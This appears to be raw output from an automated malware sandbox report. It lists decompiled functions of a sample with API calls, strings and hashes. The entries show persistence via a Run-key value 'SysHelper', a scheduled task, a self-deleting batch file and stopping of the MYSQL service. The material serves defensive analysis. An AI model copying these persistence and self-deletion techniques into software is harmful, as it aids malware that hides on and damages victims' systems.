                                                                                                                                                                                                      • Opcode ID: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
                                                                                                                                                                                                      • Instruction ID: e2c19f37e5f1fa56fd16d2c75426893bf8b780345540c0397aa12dc95392e8cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DE08C32150308FBCF21CFA0EC41FD83BA6BB58710F104419F61C4AA60CB71A964EB48
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0043884E, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,20001004,?,0042580F,?,0042580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00438875
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                      • Opcode ID: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
                                                                                                                                                                                                      • Instruction ID: 4201596fe771204303fc80694ffa3c51b65a798dd9aa63856d52ff29377aa1ed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7ED0173200020CFF8F01AFE1EC45C6A7B69FF0C314B180409FA1C45120DA36A820EB25
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004329BB, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
                                                                                                                                                                                                      • Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004124E0, Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00412539
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041255B
                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                      • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                                                      • API String ID: 2372642624-488272950
                                                                                                                                                                                                      • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                                                                      • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004635B0, Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _strncmp
                                                                                                                                                                                                      • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                                                      • API String ID: 909875538-2733969777
                                                                                                                                                                                                      • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                                                                                                                      • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00425A97, Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1503006713-0
                                                                                                                                                                                                      • Opcode ID: e1f77275b894a36aef18560a381d330bc3755f08ff7058d738956a3ca95a28b6
                                                                                                                                                                                                      • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1f77275b894a36aef18560a381d330bc3755f08ff7058d738956a3ca95a28b6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041BAE0, Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041BBE4
                                                                                                                                                                                                      • GetComputerNameW.KERNEL32 ref: 0041BBF4
                                                                                                                                                                                                      • _free.LIBCMT ref: 0041BCD7
                                                                                                                                                                                                        • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                                                                        • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                                                                                                                        • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                                                                        • Part of subcall function 00411CD0: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                                                                        • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                                                                        • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                                                                      • IsWindow.USER32(?), ref: 0041BF69
                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3873257347-0
                                                                                                                                                                                                      • Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                                                                                                                                      • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00425B6E, Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2762079118-0
                                                                                                                                                                                                      • Opcode ID: 056817dd19d1f9791209dcb1a035a563dccb51f4cf54a38a2a3efd7796871d8b
                                                                                                                                                                                                      • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 056817dd19d1f9791209dcb1a035a563dccb51f4cf54a38a2a3efd7796871d8b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00411B90, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                                                                                                                      • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                                                                      • String ID: \shell32.dll
                                                                                                                                                                                                      • API String ID: 679253221-3783449302
                                                                                                                                                                                                      • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                                                                      • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004549A0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                                                                      • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                                                                      • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                                                                      • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                                                      • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                                                      • API String ID: 2112994598-1672312481
                                                                                                                                                                                                      • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                                                                                                                      • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00454AE0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                                                                                                                      • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                                                                                                                        • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                                                                                                                      • vswprintf.LIBCMT ref: 00454B5D
                                                                                                                                                                                                      • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                                                                                                                      • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                                                                                                                      • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                                                                                                                      • MessageBoxA.USER32 ref: 00454BD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                                                      • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                                                      • API String ID: 277090408-1348657634
                                                                                                                                                                                                      • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                                                                                                                      • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412360, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004123B6
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041240E
                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • SysHelper, xrefs: 004123D6
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                                                      • API String ID: 122392481-4165002228
                                                                                                                                                                                                      • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                                                                                                                      • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00418000, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                                                                                                                      • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                                                                                                                      • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040DAC0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                                                                                                                      • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0040DBD6
                                                                                                                                                                                                      • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040DC38
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                                                      • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                                                                      • API String ID: 330603062-1376107329
                                                                                                                                                                                                      • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                                                                                                                      • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00411A10, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                                                                                                                      • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                                                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                                                                                                                      • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                                                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                                                      • String ID: MYSQL
                                                                                                                                                                                                      • API String ID: 2359367111-1651825290
                                                                                                                                                                                                      • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                                                                      • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
